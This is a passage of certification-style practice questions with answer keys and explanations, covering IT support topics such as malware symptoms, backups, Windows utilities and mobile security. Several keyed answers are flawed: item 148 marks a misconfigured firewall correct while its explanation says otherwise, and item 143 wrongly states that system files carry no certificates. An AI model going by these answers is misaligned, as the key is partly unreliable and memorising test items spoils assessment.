Rogue antivirus is when a website displays a pop-up disguised as a normal Windows dialog box with a fake security alert. The spoofed notification or browser ad is designed to alarm users and push them into installing Trojan malware, often by demanding payment for a "full version" that will supposedly remove the fictitious infections. Rogue antivirus is a popular way to disguise a Trojan.

Windows Defender Antivirus is a core component of all Windows editions. It will not generate pop-up messages to purchase the full version.

On-access is a scanning technique where the antivirus software scans the file before opening or prevents it from opening.

Execution control refers to logical security technologies designed to prevent malicious software from running on a host regardless of user account privileges.

129
Q

A server administrator notices a file server starting to run low on space. The administrator wants to create extra space before all space is used up and even worse issues arise. What should the administrator use?

devmgmt.msc

dfrgui.exe

cleanmgr.exe

Disk queue length

A

cleanmgr.exe

The Disk Cleanup utility (cleanmgr.exe) regains disk capacity by deleting unwanted files, which can help to free up disk space when running low.

Device Manager (devmgmt.msc) allows the administrator to view and edit the properties of installed hardware. Users can change hardware configuration settings, update drivers, or remove/disable devices.

If the disk queue length increases and disk time is high, then the administrator has a disk problem; this will not help free up space.

The Defragment and Optimize Drives utility (dfrgui.exe) maintains disk performance by optimizing file storage patterns and can help read and write speeds with hard drives.

130
Q

A Linux server administrator meets with their Windows server administrator counterparts. A certain grouping of Linux and Windows servers is designated to run services that share files. What will the administrators need to enable sharing between the disparate systems?

ip

samba

mv

chmod

A

samba

samba enables the integration of Linux and Windows systems. When added to a Linux workstation, that workstation can use the Windows file and print sharing protocol to access shared resources on a Windows host.

As part of the iproute2 package, the ip command has options for managing routes and the local interface configuration. The command ip addr replicates the basic reporting functionality of ifconfig (show the current address configuration).

The chmod command can secure files and directories using symbolic or octal notation. Only the owner can change permissions.

The mv command is used to move files from one directory to another or rename a file.

131
Q

An attacker imitates an IT support technician for a company. The attacker asks for a user’s password to gain access to the user’s system remotely. What is this called?

Impersonation

Dumpster diving

Shoulder surfing

Tailgating

A

Impersonation

Impersonation means that the attacker develops a pretext scenario to allow themselves to interact with an employee.

Dumpster diving refers to combing through an organization’s or individual’s garbage to try to find useful documents. Attackers may even find files stored on discarded removable media.

Shoulder surfing attacks are when the attacker learns a password, PIN, or any secure information by watching the user type it.

Tailgating is entering a secure area without authorization by following closely behind a person who has been allowed to open the door or checkpoint.

132
Q

A user implements a method that requires a one-time code within a given time frame to get access to their email account. What is this method?

Soft token

Phone call

Hard token

SMS

A

Soft token

A soft token is a software-based two-factor security token that generates a single-use login PIN to authorize computer services.

Hard tokens require the user to physically possess their authentication device to gain access to a specific network. The hard token is first registered with the service or network. When the user needs to authenticate, they connect the token and authorize it via a password, PIN, fingerprint reader, or voice recognition.

Short message service (SMS) is a text messaging service between mobile phones. The short messaging service allows up to 160 characters between phones.

Authenticator applications can be used for passwordless access or as two-factor authentication (2FA) mechanisms.

133
Q

A company has backup storage located at a different location, which lowers the risk of losing both production and backup copies of data. Which of the following is this backup storage?

Off-site backup storage

On-site backup storage

Synthetic

Frequency

A

Off-site backup storage

Off-site backup storage is more affordable and easier to implement because of high-bandwidth internet and high-capacity cloud storage providers. Transporting physical media off-site, by contrast, can be an onerous task.

A synthetic full backup is not generated directly from the original data but instead assembled from other backup jobs.

Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.

On-site backup storage means that the production system and backup media are in the same location. Having storage in the same location risks losing both the production and backup copies of the data.

134
Q

To ensure the authenticity and authorization of a mobile app, a service provider issues a certificate to valid developers. Developers can use this certificate to sign their app and to establish trust. Which of the following attributes of an app would likely disqualify it as trustworthy?

Duplicates the function of a VPN.

Duplicates the function of IoT.

Duplicates the function of core OS apps.

Duplicates the function of MDM.

A

Duplicates the function of core OS apps.

A mobile app that duplicates the function of core operating system (OS) apps would be at risk of not receiving trusted app status.

A virtual private network (VPN) is a secure tunnel created between two endpoints connected via an unsecured transport network. VPNs are not proprietary.

Mobile-device management (MDM) is a software tool for tracking, controlling, and securing an organization’s mobile infrastructure. MDMs are not proprietary.

Internet of Things (IoT) is a global network of personal devices, home appliances and control systems, and other items with network connectivity. An app could not duplicate IoT.

135
Q

A computer administrator sets up a client workstation to join a centrally managed network. What options should the administrator configure to do this?

Apps

Sign-in options

Update and security

Access work or school

A

Access work or school

Access work or school, under Accounts in the Settings app, joins the computer to a centrally managed domain network.

Sign-in options, also under Accounts, let users configure a fingerprint reader or PIN to access the computer rather than a password. The computer can also be set to lock automatically from here.

The Update & Security settings provide a single interface to manage a secure and reliable computing environment.

The Apps group is used to view and remove installed apps and Windows Features in the Settings app. Users can also configure which app should act as the default for opening, editing, and printing particular file types and manage which apps run at startup.

136
Q

An intern for a Windows server team is watching a server administrator verify the authenticity and integrity of an installer. Where did the administrator most likely get it from?

Internet download

USB

Share drive

ISO

A

Internet download

When downloading an installer from an internet location, it is imperative to verify the package’s authenticity and integrity and scan it for malware.

Setup files can be distributed on physical media, such as CD/DVD or a USB thumb drive. A USB drive is often a secondary medium, however, used after the installer was first downloaded from the internet.

If an administrator was pulling a file from a local share, it probably first came from the internet and should have been scanned during the initial download.

ISO files stored on removable media or a host system are often used to install virtual machine operating systems. The file itself might be an ISO, but the administrator would still have had to obtain it from somewhere, typically an internet download.

137
Q

If an individual is creating an account and is unable to think of a strong password, the browser can suggest strong passwords to use. What is this called?

Secure connection

Password manager

Browser sign-in

Ad-blocker

A

Password manager

Password managers suggest a strong password at each new account sign-up or credential reset and autofill this value when the user needs to authenticate to the site.

Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.

Secure connection validates the host’s identity running a site and encrypts communications to protect against snooping.

Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality. Many sites detect ad blockers and do not display any content while filtering is enabled.

138
Q

A systems administrator for client machines has managed Windows machines for some time. The company is now adding Apple computers. The security team wants to implement an equivalent to BitLocker. Which of the following should the administrator enable and configure?

Time Machine

Keychain

Privacy

FileVault

A

FileVault

FileVault is a disk encryption product. Encryption protects the data stored on a disk against the possibility that a threat actor could remove it.

macOS has options to configure what analytics/telemetry data and personalized information can be collected. Users can adjust these options via the Security & Privacy preference pane.

The Time Machine preference pane lets users back up data to an external drive or partition formatted using either the Apple File System (APFS) or macOS’s older extended file system.

The keychain feature helps users manage passwords for their accounts, websites, and Wi-Fi networks. The regular keychain is stored locally only.

139
Q

An accountant has an unlimited data plan and has set data usage limit triggers for their mobile phone. What concern does the accountant have with high data usage with an unlimited data plan? (Select all that apply.)

SELECT ALL THAT APPLY

DDoS

Cryptomining

Jailbreaking

Phishing

A

DDoS
Cryptomining

Even with an unlimited data plan, setting data usage limits allows a user to be alerted to unusually high data usage like that associated with cryptomining.

Even with an unlimited data plan, setting data usage limits allows a user to be alerted to unusually high data usage associated with being used as part of a distributed denial of service (DDoS) attack.

Phishing is when an attacker sends an email from a supposedly reputable source to elicit private information from the victim.

Jailbreaking removes the protective seal and any operating system-specific restrictions to give users greater control over the device.

140
Q

After installing Windows 10 on an old computer, a computer technician is stumped when the computer continues to boot to a blank screen. Determine which ones could conceivably fix the blank screen from the available solutions. (Select all that apply.)

SELECT ALL THAT APPLY

Run the IDLE debugger.

Repair Windows.

Update the graphics adapter driver.

Defrag the hard drive.

A

Repair Windows.
Update the graphics adapter driver.

A blank screen following a Windows installation could be caused by several factors, including an interruption to the installation process and an incomplete install. Repairing Windows could address this.

Updating the graphics driver is another possible remedy since the driver may be outdated and incompatible with Windows 10.

IDLE is the Python Integrated Development and Learning Environment. While IDLE does have a debugger, it is for Python scripts, not Windows issues.

Defragging the hard drive is done to optimize file storage and improve sluggish performance. It would not fix a blank screen.

141
Q

A user’s phone begins to act strangely, with apps responding slowly and pop-up ads appearing frequently. When the user calls the help desk and explains the issues, the technician says it sounds like malware. What other symptoms would be common to a malware infection on a mobile phone? (Select all that apply.)

SELECT ALL THAT APPLY

Increased Response Times

APK sideloading

Redirection

Fake security warnings

A

Redirection
Fake security warnings

Fake security warnings are a common symptom of malware infection. Scareware uses these to persuade users to install an app or give a Trojan app additional permissions.

Redirection attacks are a common symptom, where malware corrupts the Domain Name System (DNS) and search provider to force users to spoofed sites. This might disrupt access to legitimate sites, generate certificate warnings, and cause slow network performance.

APK (Android Package) sideloading refers to downloading apps for Android phones from a source other than Google’s Play store.

A lockout occurs after a maximum number of failed sign-in attempts.

142
Q

Malware encyclopedias are a resource that antivirus vendors often make available to IT professionals. What is their value for IT practitioners? (Select all that apply.)

SELECT ALL THAT APPLY

They are documentation of known malware.

They provide information about the type, symptoms, purpose, and removal of malware.

They troubleshoot unknown malware based on the behavior of known malware.

They provide a pricing model for remediation based on the malware found.

A

They are documentation of known malware.
They provide information about the type, symptoms, purpose, and removal of malware.

Malware encyclopedias from antivirus vendors, also called “bestiaries,” maintain information about the malware that IT professionals can use to verify and remediate malware. Information includes the type of malware, the symptoms, and the purpose.

Antivirus companies document known malware by maintaining encyclopedias, including information about the makeup, behavior, and removal process.

Malware encyclopedias do not troubleshoot known or unknown malware; they are a verification and remediation reference for known malware.

Pricing or a pricing model for malware remediation is out of the purview of an antivirus vendor’s malware encyclopedia.

143
Q

A telltale sign of a malware infection is when changes occur to system files. Which of the following is likely the result of malware-induced changes to system files? (Select all that apply.)

SELECT ALL THAT APPLY

Files with date stamps and file sizes that are different from known-good versions

Additional files with names similar to authentic system files, such as scvhost.docx or ta5kmgr.xlsx

Files that are missing or renamed

Known-good files with expired certificates

A

Files with date stamps and file sizes that are different from known-good versions
Files that are missing or renamed

System files are an attractive target for malware because renaming or deleting them can wreak havoc on the operating system.

Hackers will alter the size of system files to hide malware or change the date stamp to cover their tracks.

While malware will add additional files with names almost the same as authentic system files, the extensions .docx and .xlsx represent Word and Excel files, respectively. These are data files, not system files. System files have extensions such as .dll and .sys.

System files do not have certificates. Certificates are a security tool used by websites to prove the server is trusted.

144
Q

A company needs to set up perimeter security to control and monitor who can approach the building. Which of the following should the company use? (Select all that apply.)

SELECT ALL THAT APPLY

Access control vestibule

Fencing

Folder redirection

Guard

A

Access control vestibule
Fencing
Guard

Fencing is generally effective and needs to be transparent, so guards can see any attempt to penetrate it.

Access control vestibule is where one gateway leads to an enclosed space protected by another barrier that restricts access to one person at a time. Bollards are barricades that prevent vehicles from crashing into the building or exploding a bomb near it.

Guards can be placed in front of and around a location to protect it. They can monitor critical checkpoints, verify identification, allow or disallow access, and log physical entry occurrences.

Folder redirection changes the target of a personal folder, such as the Documents folder, Pictures folder, or Start Menu folder, to a file share.

145
Q

The System Restore tool in Windows is used to roll back configuration changes to an earlier date or restore point. One option for creating restore points is to use Task Scheduler. What other actions will create a restore point? (Select all that apply.)

SELECT ALL THAT APPLY

Installing a program

Rebooting

Deleting a file

Updating an application

A

Installing a program
Updating an application

Whenever an application or program is installed, a restore point is created.

A restore point is also created whenever an application or program is updated.

Deleting a file will not create a restore point. Likewise, when using System Restore to roll back to an earlier date, the user’s documents, pictures, and other data are not deleted. However, software and drivers installed after the restore point will be uninstalled.

A restore point is not created when a computer is rebooted, but Windows will create a restore point if one has not occurred in seven days.

146
Q

Most vendors have recycling systems for what types of products? (Select all that apply.)

SELECT ALL THAT APPLY

Battery

Toner

Device

Voltage

A

Battery
Toner
Device

Most vendors offer recycling for used toner cartridges. The products in toner powder are not classified as hazardous to health.

Batteries must be disposed of through an approved waste facility. Swollen or leaking batteries from devices must be handled carefully and stored within appropriate containers. Gloves and safety goggles may be used to minimize the risk of burns from the corrosive material.

Devices can be donated for reuse; if a device cannot be reused, it must be disposed of through an approved waste facility.

Voltage is the potential difference between two points measured in volts (V).

147
Q

A user requests a site’s certificate, but an evil twin intercepts the request and presents a spoofed certificate, which the user’s browser accepts. What has just happened? (Select all that apply.)

SELECT ALL THAT APPLY

The user thinks they have a secure connection.

An on-path attack

A rootkit attack

Malware is in the middle of the session.

A

The user thinks they have a secure connection.
An on-path attack
Malware is in the middle of the session.

An on-path attack is when a threat actor, such as an evil twin, intercepts traffic between two hosts. In this case, it was via a spoofed digital certificate.

In the middle of the session, the evil twin intercepts traffic between two hosts; this was formerly known as a “man-in-the-middle” attack.

Since the user’s browser has accepted the spoofed digital certificate, the user believes they have a secure session, even though they do not.

A rootkit is malware that modifies system files, often at the kernel (root) level.

148
Q

A user experiences significant system instability on their computer. It frequently shuts down, freezes, reboots, and powers off with no accompanying error messages. Which of the following problems would cause this instability? (Select all that apply.)

SELECT ALL THAT APPLY

Too many connected devices

Misconfigured firewall

Overheating

Failing CPU

A

Misconfigured firewall
Overheating
Failing CPU

Excessive heat can damage computer circuitry and induce shutdowns, freezing, and reboots. A common cause of overheating is fans clogged with dust.

A failing CPU can lead to crashes, freezing, and reboots. Overheating and power surges are often to blame for damage to the CPU.

A misconfigured firewall introduces the risk of a malware infection that could cause some of these instability symptoms. However, in and of itself, it does not.

Too many connected devices will generate a warning message that there are not enough USB resources. This situation will not shut down the computer or make it freeze or reboot.

149
Q

Which of the following are proper component handling tools and techniques to protect electronic components against electrostatic discharge when fixing a PC or mobile device? (Select all that apply.)

SELECT ALL THAT APPLY

Air filter mask

ESD mat

ESD straps

Safety goggles

A

ESD mats
ESD straps

Anti-electrostatic discharge (ESD) straps are worn to dissipate static charges effectively. The band should fit snugly around the wrist or ankle so that the metal stud contacts the skin.

Electrostatic discharge (ESD) mats are used to organize sensitive components. The mats contain a snap connected to the wrist or leg strap.

Safety goggles minimize the risk of burns from corrosive materials, such as leaking batteries in cellphones or tablets, and of eye irritation from particles such as toner or dust.

An air filter mask that fits over the mouth and nose is a recommended face covering when working with compressed air, toner spills, or working in a dusty environment. An air filter mask will not protect the eyes.

150
Q

A malware infection can manifest in many ways, often making it difficult to diagnose. Malware may cause which of the following computer issues? (Select all that apply.)

SELECT ALL THAT APPLY

Redirection

Roaming profiles

UAC is enabled

Windows update fails

A

Redirection
Windows update fails

One of the key indicators of malware infection is that security-related applications, such as antivirus, firewall, and Windows Update, stop working. Other applications or Windows tools, such as Task Manager, may also stop working or crash frequently.

Malware often targets the web browser. An example is a redirection, where the user tries to open one page but gets sent to another.

User Account Control (UAC) is a system to prevent unauthorized use of administrator privileges. Malware may try to disable UAC, but it would not enable it.

A roaming profile copies the whole profile from a share at logon and copies the updated profile back at logoff.

151
Q

A user has owned the same personal computer for a while and thinks it might be time for an upgrade. Which of the following are upgrade considerations? (Select all that apply.)

SELECT ALL THAT APPLY

PXE support

Backup files

Application support

Hardware compatibility

A

Backup files
Application support
Hardware compatibility

Hardware compatibility is a consideration. The user must make sure that the central processing unit (CPU), chipset, and RAM components are sufficient to run the OS.

Application and driver support and backward compatibility are other considerations. Most version upgrades try to maintain support for applications and device drivers developed for older versions.

Backup files and user preferences are a consideration. If the user is installing a new operating system or doing a clean install, the user should back up any necessary data and settings.

Most computers now come with Preboot eXecution Environment (PXE)–compliant firmware and a network adapter that supports this boot option, so PXE support is not necessarily a consideration.

152
Q

A technician needs this skill to give full attention to the customer, so there is no disagreement or misinterpretation of what was said. What is this skill?

Proper language

Cultural sensitivity

Active listening

Open-end questions

A

Active listening

Active listening is the skill of listening to an individual, giving that person full attention, and not arguing with, commenting on, or misinterpreting what they have said.

Proper language means not being overly familiar with customers. Do not use slang phrases or any language that may cause offense. When actively listening, the employee makes a conscious effort to focus on what the other person is saying.

Cultural sensitivity means being aware of other people’s customs and habits, not judging the customer.

Open-ended questions invite the other person to compose a response.

153
Q

An IT manager is in charge of client machine administration. The manager wants to test various boot settings before applying them to the environment. Which tool can the manager use to accomplish this best?

msconfig.exe

dfrgui.exe

gpedit.msc

cleanmgr.exe

A

msconfig.exe

The System Configuration Utility (msconfig.exe) is used to modify various settings and files that affect the way the computer boots and loads Windows.

The Group Policy Editor (gpedit.msc) provides a more robust means of configuring many Windows settings than editing the registry directly.

The Disk Cleanup utility (cleanmgr.exe) regains disk capacity by deleting unwanted files and can help to free up disk space when running low.

The Defragment and Optimize Drives utility (dfrgui.exe) maintains disk performance by optimizing file storage patterns which can help read and write speeds with hard drives.

154
Q

A software company hires a new app developer. The corporate network denies access when the developer tries to connect their phone. Why would the network deny access from the developer’s mobile phone?

Sluggish response time

High network traffic

App spoofing

Developer mode

A

Developer mode

The developer’s phone is in developer mode. The company’s Mobile Device Management (MDM) system blocks access to the network because developer mode can be used to install bootleg apps.

High network traffic is a bandwidth utilization issue; it would not cause access to the network to be denied.

App spoofing is when a malicious app imitates a legitimate app by using a similar name, along with fake reviews and automated downloads to boost its apparent popularity.

Sluggish response time on a mobile device could be caused by malware, too many open apps, and a low battery charge, among other things. It would not cause the device to be denied network access.

155
Q

A user is buying software for their PC. Which of the following would the user be purchasing for individual use?

Personal license

DRM

Data retention requirements

Corporate-use license

A

Personal license

A personal license allows the product to be used by a single person at a time, though it might permit installation on multiple personal devices.

A corporate-use license is for multiple users, which means the company can install the software on an agreed-upon number of computers for its employees to use simultaneously. The company will offer a valid license with the product key. These can be non-expired licenses as well.

Data retention requirements are regulations that set a maximum period for data retention. The regulation might also demand that information be retained for a minimum period.

Digital music and video are often subject to copy protection and digital rights management (DRM).

156
Q

A server administrator experiences performance issues on a server and needs to narrow down the source of the problem. The server is an externally facing website with high visibility for the company. The longer the site is having issues, the more customers might notice and possibly damage the company’s reputation. What can the administrator use to view and log performance statistics? (Select all that apply.)

SELECT ALL THAT APPLY

resmon.exe

msinfo32.exe

perfmon.msc

devmgmt.msc

A

resmon.exe
perfmon.msc

Resource Monitor (resmon.exe) is used to view and log performance statistics. A Microsoft Management Console (MMC) contains one or more snap-ins used to modify advanced settings for a subsystem.

Performance Monitor (perfmon.msc) is also used to view and log performance statistics. The administrator can use this to identify the source of the issue.

Device Manager (devmgmt.msc) allows the administrator to view and edit the properties of installed hardware. Users can change hardware configuration settings, update drivers, or remove/disable devices.

The System Information (msinfo32.exe) tool produces a comprehensive report about the system’s hardware and software components.

157
Q

A technician destroys disks by putting holes through them and smashing them with a hammer. What is this method?

Erasing/wiping

Degaussing

Drilling

Incinerating

A

Drilling

Drilling is used when a disk needs to be destroyed; IT uses a drill or hammer. The goal is to render the drive unusable.

Degaussing is when a hard disk is exposed to a powerful electromagnet that disrupts the magnetic pattern that stores the data on the disk surface.

Incinerating is when the disk is exposed to high heat to melt its components. It is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.

Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.

158
Q

A security awareness trainer spends a good portion of the training class talking about phishing, given its popularity as an attack vector. Phishing campaigns are getting more sophisticated, so the trainer is helping the class learn how to identify a phishing email. Which of the following is an indicator of phishing? (Select all that apply.)

SELECT ALL THAT APPLY

Inconsistent sender and reply-to addresses

No signature

Urgency

Disguised links

A

Inconsistent sender and reply-to addresses
Urgency
Disguised links

Many phishing emails have a sense of urgency so that the recipient will act now or else it will be too late. In business, this could be an email that appears to be from the boss, who needs something right away.

The email sender’s address (the FROM address) should be consistent with the REPLY-TO address.

Links in phishing emails can be disguised. For example, a link that appears to be www.microsoft.com reveals a very different URL, such as www.maliciouslink.com, when the cursor hovers over the link.

An email with no signature is not an indicator of phishing.

159
Q

Microsoft provides a repository of information about threats that Windows Defender discovers. What is the name of the repository?

Windows Recovery Environment

Microsoft Knowledge Base

Microsoft 365

Windows Hello

A

Microsoft Knowledge Base

The Microsoft Knowledge Base can be used to obtain additional information about threats discovered by Windows Defender Antivirus. The Knowledge Base has more than 150,000 articles created by support professionals about topics such as indicators for manual verification, the impact of infection, and the likelihood of other systems being compromised.

Microsoft 365 is an office productivity and data storage suite operated by Microsoft.

Windows Hello is a feature that supports passwordless sign-in for Windows.

Windows Recovery Environment (WinRE) is a troubleshooting feature that installs a command shell environment to a recovery partition to remediate boot issues.

160
Q

An employee uses an option to ask for help from a technician with an invitation file protected by a passcode. What is this option?

RDP

RMM

VPN

MSRA

A

MSRA

Microsoft Remote Assistance (MSRA) allows a user to ask for help from a technician or co-worker by an invitation file protected by a passcode. The helper opens the invitation file to connect to the remote system.

Remote Monitoring and Management (RMM) tools are principally designed for use by managed service providers (MSPs).

Remote Desktop Protocol (RDP) implements terminal server and client functionality. RDP authentication and session data are always encrypted.

A virtual private network (VPN) establishes a tunneled link that joins a local computer to a remote network. The user establishes a VPN link and then uses Remote Desktop to connect to a host on the private network.

161
Q

A helpdesk technician is helping a user experiencing printer problems. After several troubleshooting steps, the technician thinks the user may have installed the wrong driver. Where can they go to install a different one?

Indexing Options

Device Manager

Programs and Features

Network and Sharing

A

Device Manager

Device Manager allows users to view and edit the properties of installed hardware. They can change hardware configuration settings, update drivers, or remove/disable devices.

The Programs and Features Control Panel applet is the legacy software management interface. Users can use it to install and modify desktop applications and Windows Features.

Network and Sharing Center is a Control Panel applet that shows status information. Printer drivers will not be located here.

Search is also governed by settings configured in the Indexing Options applet. A corrupted index is a common cause of search problems.

172
Q

A user is conscientious about security after hearing about breaches in the news. The user wants to see if they are up to date on patches for their Apple computer. Where should the user go to check?

Displays

Printers & Scanners

System Preferences

App Store

A

App Store

The App Store checks daily for new updates/patches and releases of installed apps in macOS. If a new version is available, a notification will be shown against the App Store icon in the dock.

The Displays preference pane allows users to scale the desktop, set the brightness level, calibrate to a given color profile, and configure Night Shift settings to make the display adapt to ambient light conditions.

Use the Printers & Scanners preference pane to add and manage print and scan devices.

Users can manage network settings either from the Status menu on the right-hand side of the menu bar or via System Preferences.

173
Q

A server administrator wants to run the latest technologies. What technology should the administrator start using which will replace the New Technology File System (NTFS)?

ext3

ReFS

APFS

exFAT

A

ReFS

Resilient File System (ReFS) is being developed to replace NTFS. ReFS is only available for Pro for Workstations and Enterprise editions and cannot currently be used for the boot volume.

Most Linux distributions use some version of the extended (ext) file system to format partitions on mass storage devices. ext3 is a 64-bit file system with journaling support.

Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac workstations and laptops use the proprietary Apple File System (APFS).

exFAT is a 64-bit version of FAT designed for use with removable hard drives and flash media.

174
Q

A user uses a scripting language based on Microsoft’s Visual Basic programming language. Which of the following extensions is used?

.py

.vbs

.js

.bat

A

.vbs

.vbs is the VBScript file extension. VBScript predates PowerShell. The wscript.exe interpreter executes VBScript by default.

.bat is the Windows batch file extension. A shell script for the basic Windows CMD interpreter is often described as a batch file.

.js is the JavaScript file extension. JavaScript is a scripting language designed to implement interactive web-based content and web applications. Most web servers and browsers are configured with a JavaScript interpreter.

.py is the Python file extension. Python is a general-purpose scripting and programming language that can develop both automation scripts and software applications.

175
Q

A server administrator locks down security on their golden client image but is concerned about potentially breaking things in the environment. They decided to set up a test image for test users in various departments before full implementation. What should the administrator use to make individual configuration changes to the image?

services.msc

shell:startup

gpedit.msc

regedit.exe

A

regedit.exe

The Windows registry provides a remotely accessible database for storing operating system, device, and software application configuration information. The administrator can use the Registry Editor (regedit.exe) to view or edit the registry.

The Group Policy Editor (gpedit.msc) provides a more robust means of configuring many Windows settings than editing the registry directly.

The Services console (services.msc) starts, stops, and pauses processes running in the background. In order to make configuration changes, regedit.exe in this group of options would be used.

The Startup tab lets administrators disable programs added to the Startup folder (type shell:startup at the Run dialog to access this).

176
Q

What allows a user to download from a vendor’s website and select the correct patch for their device’s make and model?

Encryption setting

Change default password

Firmware updates

Physical placement

A

Firmware updates

Firmware updates are important because they allow the user to fix security holes and support the latest security standards.

Change the default password to secure the administrator account. Choose a new strong password of 12 characters or more. This is more secure than leaving the default, which someone may be able to guess easily.

Physical placement of any type of router or network appliance should be made to a secure location. A non-malicious threat actor could damage or power off an appliance by accident.

Encryption settings allow users to set the authentication mode.

177
Q

Which of the following will block untrusted application sources from running?

OS updates

Firewall

Failed login attempts

Anti-malware

A

Anti-malware

Anti-malware applications designed for mobile devices tend to work more like content filters to block access to known phishing sites and block adware/spyware activity by apps.

Failed login attempts mean that the device locks for a set period if an incorrect passcode or bio gesture is used; this deters attempts to guess the passcode or use a spoofed biometric.

OS updates are as critical for a mobile device as they are for a desktop computer. The iOS install base is generally better at applying updates because of the consistent hardware and software platform.

Firewall applications for mobile devices can monitor app activity and prevent connections to ports or IP addresses.

178
Q

An administrator wants to listen to music through headphones to help with productivity during work. However, the administrator is having issues connecting the headphones via Bluetooth. Where should they go first to look?

Network

System

Devices

Personalization

A

Devices

The Devices settings pages contain options for input devices (mice, keyboards, and touch), print/scan devices, and adding and managing other peripherals attached over Bluetooth or USB.

The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying).

Network & Internet is the modern settings app used to view network status, change the IP address properties of each adapter, and access other tools.

The Personalization settings allow users to select and customize themes, which set the appearance of the desktop environment.

179
Q

What is this called when antivirus software scans a file before allowing or preventing it from opening?

Scheduled scanning

Quick scanning

On-access scanning

Smart scanning

A

On-access scanning

On-access scanning is when the antivirus software intercepts an operating system call to open a file and scans the file before allowing or preventing it from being opened. Most security software is now configured to scan on-access.

A scheduled scan is run at a determined time and frequency. All security software supports scheduled scans.

A smart scan scans a computer’s critical areas, like system memory, hidden services, boot sectors, auto-run entries, registry keys, and important operating system files and folders.

A quick scan looks at all the locations where there could be malware, such as registry keys and known Windows startup folders.

180
Q

A user notices that their device has a leaking component and needs to take careful measures to minimize any risk and discard the component at an approved waste facility. Which of the following disposal types is this?

Fuse

Toner

Device

Battery

A

Battery

Batteries must be disposed of through an approved waste facility. Swollen or leaking batteries from devices must be handled carefully and stored within appropriate containers. Gloves and safety goggles may minimize the risk of burns from the corrosive material.

Most vendors offer recycling of used toner cartridges. The products in toner powder are not classified as hazardous to health.

Devices can be donated for disposal, and if a device cannot be reused, it must be disposed of through an approved waste facility.

An electrical device has a fuse appropriate to its maximum current. If the current increases past the fuse capacity, the fuse will blow. However, if the fuse fitted is rated too low, the fuse will blow too easily.

181
Q

A company is conducting live meetings between two or more participants at different sites. What is this called?

Desktop management

File transfer

Screen-sharing

Videoconferencing

A

Videoconferencing

Some web-conferencing and videoconferencing software, like Microsoft Teams and Zoom, provides a screen-sharing client that participants may control.

Screen-sharing is software that is designed to work over HTTPS across the internet. This is secure because the connection is encrypted but also easier to implement as it does not require special firewall rules.

Desktop management suites are designed for deployment by a single organization and focus primarily on access control and authorization.

With file transfer, users can choose a file-sharing protocol that can be used across all connected hosts. It allows configuring permissions on the share and provisioning user accounts that are recognized by both the server and client.

182
Q

An administrator is backup chaining a database with the type of backup that utilizes a moderate time and storage requirement. What type of backup is this?

Full with differential

Retention

Frequency

Full with incremental

A

Full with differential

Full with differential means that the chain starts with a full backup and then runs differential jobs that select new files and files modified since the original full job.

Full with incremental means that the chain starts with a full backup and then runs incremental jobs that select only new files and files modified since the previous job.

Frequency is the period between backup jobs. If the edits are much more difficult to reconstruct, the backup frequency might need to be measured in hours, minutes, or seconds.

Retention is the period that any given backup job is kept for. Short-term retention is important for version control and for recovering from malware infection.

183
Q

A technician is tasked to figure out why a user’s Gmail app will not update on their mobile phone. The technician knows several reasons that would cause this to occur. Which of the following would be one of the reasons for this problem?

GPS

Bluetooth

Storage

Accelerometer

A

Storage

If an app fails to update, there may be insufficient storage space (Gmail uses a lot of storage). It could also be that the update is incompatible with the existing operating system version, or there is no internet connection.

An accelerometer is a technology that detects when a device changes position and adjusts the screen orientation appropriately.

Bluetooth is used to connect peripheral devices to PCs and mobiles and to share data between two systems.

Global Positioning System (GPS) is a means of determining a receiver’s position based on information received from satellites.

184
Q

What tool will distinguish client accounts and provide support for recording and reporting billable support activity?

RMM

RDP

VPN

VNC

A

RMM

Remote Monitoring and Management (RMM) tools are principally designed for use by managed service providers (MSPs).

Remote Desktop Protocol (RDP) implements terminal server and client functionality. RDP authentication and session data are always encrypted.

A virtual private network (VPN) establishes a tunneled link that joins a local computer to a remote network. Establish a VPN link and then use a remote desktop to connect to a host on the private network.

Virtual network computing (VNC) is a freeware product with similar functionality to RDP. It works over TCP port 5900. Not all versions of VNC support connection security.

185
Q

A server administrator tests connectivity between two statically assigned servers in a forest with different domains. What should they check first in this case?

Subnet mask

Gateway

DNS settings

IP addressing scheme

A

DNS settings

Because the servers are on different domains, DNS should be checked first. The administrator probably uses the hostname instead of the fully qualified domain name (FQDN). If not specified, the host will likely try to resolve to the same domain.

The IP addressing scheme would not be part of the troubleshooting process because the administrator relies on DNS resolution.

The subnet mask could be an issue, but the most likely issue is the different domains.

The gateway could also be configured improperly, although if that were the case, they would not be able to reach out at all, not just the one other server.

186
Q

A researcher calls the help desk complaining of slow computer performance. When the technician arrives and probes for clues, the researcher explains that they frequently run multiple programs simultaneously and have a significant number of browser tabs open to aid with their research. Which of the following solutions should speed up the computer’s performance?

Run System Restore.

Add RAM.

Have the user run the computer in Safe Mode with Networking.

Reset Windows.

A

Add RAM.

Running multiple programs and having a lot of browser tabs open consumes a lot of RAM. Since the researcher needs to continue this practice to do their job, adding more RAM should improve performance.

System Restore is mostly used to roll back a configuration change, such as installing or updating. It does not help with memory-constrained performance.

Safe Mode is a troubleshooting environment that loads only the basic drivers and services required to start the system. While running Safe Mode with Networking allows internet access, the environment is not conducive to resource-consuming programs.

Resetting Windows using Reset this PC restores the computer’s factory default settings and removes all applications.

187
Q

A company’s IT support specialist is ready to start recommissioning a system as part of the malware removal process. What is the last step before removing the computer from quarantine?

Antivirus scan

Create a fresh restore point.

Verify DNS configuration.

Re-enable System Restore.

A

Antivirus scan

Before removing a computer system from quarantine, the final step is to run another antivirus scan to make sure the system is clean.

Creating a new restore point (or system image) is one component of recommissioning and is done after re-enabling the System Restore but before running a final antivirus scan.

Re-enabling the System Restore is the beginning of the recommissioning process, along with re-enabling any disabled automatic backups.

Verifying Domain Name System (DNS) configuration to prevent reinfection is part of recommissioning, but it comes before the final antivirus scan.

188
Q

A user is only able to read data on the file. What account management policy is this?

Change default administrator account.

Disable guest accounts.

Restrict login times.

Restrict user permission.

A

Restrict user permission.

Restricting user permissions: some networks have complex requirements for assigning rights, but the basic principle is that the number of accounts with administrator privileges should be as few as possible.

